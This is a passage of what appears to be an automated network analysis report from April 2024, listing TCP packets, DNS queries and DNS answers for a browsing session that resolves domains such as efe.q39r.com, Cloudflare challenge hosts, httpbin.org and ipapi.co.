                                                                                  Apr 25, 2024 18:24:27.350919008 CEST44349800172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.374290943 CEST49801443192.168.2.173.221.38.252
                                                                                  Apr 25, 2024 18:24:27.374326944 CEST443498013.221.38.252192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.374401093 CEST49801443192.168.2.173.221.38.252
                                                                                  Apr 25, 2024 18:24:27.374583960 CEST49801443192.168.2.173.221.38.252
                                                                                  Apr 25, 2024 18:24:27.374603033 CEST443498013.221.38.252192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.375207901 CEST49802443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:27.375216961 CEST44349802172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.375281096 CEST49802443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:27.375438929 CEST49802443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:27.375453949 CEST44349802172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.581774950 CEST44349800172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.582108021 CEST49800443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:27.582154989 CEST44349800172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.582598925 CEST44349800172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.582887888 CEST49800443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:27.582973957 CEST44349800172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.583020926 CEST49800443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:27.628156900 CEST44349800172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.632172108 CEST49800443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:27.718904018 CEST44349802172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.719283104 CEST49802443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:27.719311953 CEST44349802172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.721271992 CEST44349802172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.721476078 CEST49802443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:27.722296000 CEST49802443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:27.722383976 CEST44349802172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.722456932 CEST49802443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:27.722466946 CEST44349802172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.753941059 CEST443498013.221.38.252192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.754223108 CEST49801443192.168.2.173.221.38.252
                                                                                  Apr 25, 2024 18:24:27.754236937 CEST443498013.221.38.252192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.755239964 CEST443498013.221.38.252192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.755414963 CEST49801443192.168.2.173.221.38.252
                                                                                  Apr 25, 2024 18:24:27.755582094 CEST49801443192.168.2.173.221.38.252
                                                                                  Apr 25, 2024 18:24:27.755630016 CEST443498013.221.38.252192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.755708933 CEST49801443192.168.2.173.221.38.252
                                                                                  Apr 25, 2024 18:24:27.755714893 CEST443498013.221.38.252192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.774051905 CEST49802443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:27.806088924 CEST49801443192.168.2.173.221.38.252
                                                                                  Apr 25, 2024 18:24:27.881853104 CEST443498013.221.38.252192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.881932020 CEST443498013.221.38.252192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.882059097 CEST49801443192.168.2.173.221.38.252
                                                                                  Apr 25, 2024 18:24:27.882770061 CEST49801443192.168.2.173.221.38.252
                                                                                  Apr 25, 2024 18:24:27.882790089 CEST443498013.221.38.252192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.931356907 CEST44349802172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.931487083 CEST44349802172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.931582928 CEST49802443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:27.932241917 CEST49802443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:27.932270050 CEST44349802172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.018554926 CEST49803443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:28.018644094 CEST44349803172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.018775940 CEST49803443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:28.019011974 CEST49803443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:28.019047022 CEST44349803172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.047274113 CEST49804443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:28.047348976 CEST44349804172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.047456026 CEST49804443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:28.047677994 CEST49804443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:28.047703981 CEST44349804172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.172465086 CEST44349800172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.172554970 CEST44349800172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.172669888 CEST49800443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:28.173446894 CEST49800443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:28.173487902 CEST44349800172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.246493101 CEST44349803172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.246822119 CEST49803443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:28.246886015 CEST44349803172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.247247934 CEST44349803172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.247576952 CEST49803443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:28.247658968 CEST44349803172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.247761965 CEST49803443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:28.292131901 CEST44349803172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.401252985 CEST44349804172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.401597023 CEST49804443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:28.401659012 CEST44349804172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.402744055 CEST44349804172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.402842999 CEST49804443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:28.403136969 CEST49804443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:28.403225899 CEST44349804172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.403278112 CEST49804443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:28.444160938 CEST44349804172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.445159912 CEST49804443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:28.445195913 CEST44349804172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.493058920 CEST49804443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:28.620404959 CEST44349804172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.620552063 CEST44349804172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.620712042 CEST49804443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:28.621686935 CEST49804443192.168.2.17172.67.69.226
                                                                                  Apr 25, 2024 18:24:28.621723890 CEST44349804172.67.69.226192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.803982973 CEST44349803172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.804125071 CEST44349803172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.804250002 CEST49803443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:28.804250002 CEST49803443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:28.804250002 CEST49803443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:32.743634939 CEST49741443192.168.2.17151.101.130.137
                                                                                  Apr 25, 2024 18:24:32.743740082 CEST44349741151.101.130.137192.168.2.17
                                                                                  Apr 25, 2024 18:24:32.743829966 CEST49741443192.168.2.17151.101.130.137
                                                                                  Apr 25, 2024 18:24:48.813800097 CEST49805443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:48.813879013 CEST44349805172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:48.813987970 CEST49805443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:48.814306974 CEST49805443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:48.814335108 CEST44349805172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:49.051846027 CEST44349805172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:49.052182913 CEST49805443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:49.052207947 CEST44349805172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:49.052602053 CEST44349805172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:49.052903891 CEST49805443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:49.052979946 CEST44349805172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:49.053826094 CEST49805443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:49.100121975 CEST44349805172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:49.601944923 CEST44349805172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:49.602085114 CEST44349805172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:49.602142096 CEST49805443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:49.602175951 CEST49805443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:49.602200031 CEST44349805172.67.218.12192.168.2.17
                                                                                  Apr 25, 2024 18:24:49.602212906 CEST49805443192.168.2.17172.67.218.12
                                                                                  Apr 25, 2024 18:24:49.602246046 CEST49805443192.168.2.17172.67.218.12
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Apr 25, 2024 18:22:52.515739918 CEST5462653192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:52.518117905 CEST5054753192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:52.605607033 CEST53616331.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:52.646037102 CEST53546261.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:52.649324894 CEST53505471.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:52.729305029 CEST53552521.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:53.349317074 CEST53544831.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:53.571686983 CEST5790653192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:53.571832895 CEST5258653192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:53.701729059 CEST53579061.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:53.702009916 CEST53525861.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:54.198323011 CEST5745053192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:54.198518991 CEST5957953192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:54.328490019 CEST53574501.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:54.337135077 CEST53595791.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:57.112055063 CEST6198053192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:57.112386942 CEST5885953192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:57.113250017 CEST5549653192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:57.113389969 CEST5242053192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:57.222157955 CEST53619801.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:57.222310066 CEST53588591.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:57.223417044 CEST53554961.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:57.224448919 CEST53524201.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:57.236120939 CEST5100753192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:57.236223936 CEST5703153192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:57.346220016 CEST53510071.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:57.346420050 CEST53570311.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:58.639410973 CEST5609053192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:58.639621019 CEST5941153192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:58.750694036 CEST53560901.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:58.750797987 CEST53594111.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:59.875178099 CEST6486453192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:59.875545025 CEST5983353192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:22:59.985248089 CEST53648641.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:22:59.987737894 CEST53598331.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:00.330159903 CEST5015053192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:23:00.330306053 CEST5832553192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:23:00.439953089 CEST53501501.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:00.440412998 CEST53583251.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:10.254429102 CEST53623451.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:29.189819098 CEST53602121.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:30.983714104 CEST5676853192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:23:30.983896971 CEST5951153192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:23:31.098404884 CEST53567681.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:31.098753929 CEST53595111.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:32.702488899 CEST5761553192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:23:32.702697039 CEST5586053192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:23:32.703222036 CEST6182553192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:23:32.703509092 CEST6343453192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:23:32.813297033 CEST53618251.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:32.813764095 CEST53558601.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:32.818629026 CEST53634341.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:32.818654060 CEST53576151.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:33.637568951 CEST53493481.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:34.614665031 CEST53505751.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:43.059895039 CEST53634021.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:51.930320978 CEST53637561.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:23:52.602297068 CEST53615731.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:24:00.332182884 CEST4973353192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:24:00.332309961 CEST5752853192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:24:00.442609072 CEST53497331.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:24:00.442640066 CEST53575281.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:24:06.214534044 CEST138138192.168.2.17192.168.2.255
                                                                                  Apr 25, 2024 18:24:20.830640078 CEST53508101.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:24:26.582647085 CEST6043953192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:24:26.582799911 CEST6489653192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:24:26.692802906 CEST53648961.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:24:26.706046104 CEST53604391.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.260653973 CEST6311953192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:24:27.261034012 CEST5528953192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:24:27.261733055 CEST6324953192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:24:27.261883974 CEST5357953192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:24:27.370954037 CEST53631191.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.371321917 CEST53632491.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.373913050 CEST53535791.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.374860048 CEST53552891.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:24:27.934964895 CEST6231453192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:24:27.935206890 CEST5376153192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:24:28.044955969 CEST53623141.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:24:28.046662092 CEST53537611.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:24:57.349977016 CEST5182653192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:24:57.350085974 CEST5307053192.168.2.171.1.1.1
                                                                                  Apr 25, 2024 18:24:57.460645914 CEST53530701.1.1.1192.168.2.17
                                                                                  Apr 25, 2024 18:24:57.461165905 CEST53518261.1.1.1192.168.2.17
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Apr 25, 2024 18:22:52.515739918 CEST192.168.2.171.1.1.10x5e6dStandard query (0)web.lehighvalleychamber.orgA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:52.518117905 CEST192.168.2.171.1.1.10xd024Standard query (0)web.lehighvalleychamber.org65IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:53.571686983 CEST192.168.2.171.1.1.10x2388Standard query (0)sanemedia.caA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:53.571832895 CEST192.168.2.171.1.1.10xac7dStandard query (0)sanemedia.ca65IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:54.198323011 CEST192.168.2.171.1.1.10xac59Standard query (0)efe.q39r.comA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:54.198518991 CEST192.168.2.171.1.1.10x241bStandard query (0)efe.q39r.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.112055063 CEST192.168.2.171.1.1.10x93daStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.112386942 CEST192.168.2.171.1.1.10x228dStandard query (0)code.jquery.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.113250017 CEST192.168.2.171.1.1.10xc6eeStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.113389969 CEST192.168.2.171.1.1.10x84c9Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.236120939 CEST192.168.2.171.1.1.10xf15Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.236223936 CEST192.168.2.171.1.1.10x2ab2Standard query (0)www.google.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:58.639410973 CEST192.168.2.171.1.1.10x6034Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:58.639621019 CEST192.168.2.171.1.1.10x866Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:59.875178099 CEST192.168.2.171.1.1.10x24d5Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:59.875545025 CEST192.168.2.171.1.1.10x6af3Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:00.330159903 CEST192.168.2.171.1.1.10x2fe0Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:00.330306053 CEST192.168.2.171.1.1.10xcfc0Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:30.983714104 CEST192.168.2.171.1.1.10x170aStandard query (0)efe.q39r.comA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:30.983896971 CEST192.168.2.171.1.1.10xbc82Standard query (0)efe.q39r.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.702488899 CEST192.168.2.171.1.1.10x3a58Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.702697039 CEST192.168.2.171.1.1.10xd605Standard query (0)cdn.socket.io65IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.703222036 CEST192.168.2.171.1.1.10xbc3fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:32.703509092 CEST192.168.2.171.1.1.10x8e26Standard query (0)www.google.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:00.332182884 CEST192.168.2.171.1.1.10x7554Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:00.332309961 CEST192.168.2.171.1.1.10xa74fStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:26.582647085 CEST192.168.2.171.1.1.10xb667Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:26.582799911 CEST192.168.2.171.1.1.10x2d21Standard query (0)httpbin.org65IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.260653973 CEST192.168.2.171.1.1.10x9da1Standard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.261034012 CEST192.168.2.171.1.1.10x3b5eStandard query (0)ipapi.co65IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.261733055 CEST192.168.2.171.1.1.10xe8dStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.261883974 CEST192.168.2.171.1.1.10x3472Standard query (0)httpbin.org65IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.934964895 CEST192.168.2.171.1.1.10xfc0fStandard query (0)ipapi.coA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:27.935206890 CEST192.168.2.171.1.1.10x83a6Standard query (0)ipapi.co65IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:57.349977016 CEST192.168.2.171.1.1.10x8c10Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:24:57.350085974 CEST192.168.2.171.1.1.10x5b77Standard query (0)www.google.com65IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Apr 25, 2024 18:22:52.646037102 CEST1.1.1.1192.168.2.170x5e6dNo error (0)web.lehighvalleychamber.orglehighvalleypacoc.weblinkconnect.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:52.646037102 CEST1.1.1.1192.168.2.170x5e6dNo error (0)lehighvalleypacoc.weblinkconnect.com104.18.247.141A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:52.646037102 CEST1.1.1.1192.168.2.170x5e6dNo error (0)lehighvalleypacoc.weblinkconnect.com104.18.245.141A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:52.646037102 CEST1.1.1.1192.168.2.170x5e6dNo error (0)lehighvalleypacoc.weblinkconnect.com104.18.246.141A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:52.646037102 CEST1.1.1.1192.168.2.170x5e6dNo error (0)lehighvalleypacoc.weblinkconnect.com104.18.244.141A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:52.646037102 CEST1.1.1.1192.168.2.170x5e6dNo error (0)lehighvalleypacoc.weblinkconnect.com104.18.248.141A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:52.649324894 CEST1.1.1.1192.168.2.170xd024No error (0)web.lehighvalleychamber.orglehighvalleypacoc.weblinkconnect.comCNAME (Canonical name)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:52.649324894 CEST1.1.1.1192.168.2.170xd024No error (0)lehighvalleypacoc.weblinkconnect.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:53.701729059 CEST1.1.1.1192.168.2.170x2388No error (0)sanemedia.ca162.241.120.242A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:54.328490019 CEST1.1.1.1192.168.2.170xac59No error (0)efe.q39r.com172.67.218.12A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:54.328490019 CEST1.1.1.1192.168.2.170xac59No error (0)efe.q39r.com104.21.17.5A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:54.337135077 CEST1.1.1.1192.168.2.170x241bNo error (0)efe.q39r.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.222157955 CEST1.1.1.1192.168.2.170x93daNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.222157955 CEST1.1.1.1192.168.2.170x93daNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.222157955 CEST1.1.1.1192.168.2.170x93daNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.222157955 CEST1.1.1.1192.168.2.170x93daNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.223417044 CEST1.1.1.1192.168.2.170xc6eeNo error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.223417044 CEST1.1.1.1192.168.2.170xc6eeNo error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.224448919 CEST1.1.1.1192.168.2.170x84c9No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.346220016 CEST1.1.1.1192.168.2.170xf15No error (0)www.google.com142.250.9.104A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.346220016 CEST1.1.1.1192.168.2.170xf15No error (0)www.google.com142.250.9.103A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.346220016 CEST1.1.1.1192.168.2.170xf15No error (0)www.google.com142.250.9.105A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.346220016 CEST1.1.1.1192.168.2.170xf15No error (0)www.google.com142.250.9.106A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.346220016 CEST1.1.1.1192.168.2.170xf15No error (0)www.google.com142.250.9.147A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.346220016 CEST1.1.1.1192.168.2.170xf15No error (0)www.google.com142.250.9.99A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:57.346420050 CEST1.1.1.1192.168.2.170x2ab2No error (0)www.google.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:58.750694036 CEST1.1.1.1192.168.2.170x6034No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:58.750694036 CEST1.1.1.1192.168.2.170x6034No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:58.750797987 CEST1.1.1.1192.168.2.170x866No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:59.985248089 CEST1.1.1.1192.168.2.170x24d5No error (0)challenges.cloudflare.com104.17.2.184A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:59.985248089 CEST1.1.1.1192.168.2.170x24d5No error (0)challenges.cloudflare.com104.17.3.184A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 18:22:59.987737894 CEST1.1.1.1192.168.2.170x6af3No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                  Apr 25, 2024 18:23:00.439953089 CEST1.1.1.1192.168.2.170x2fe0No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
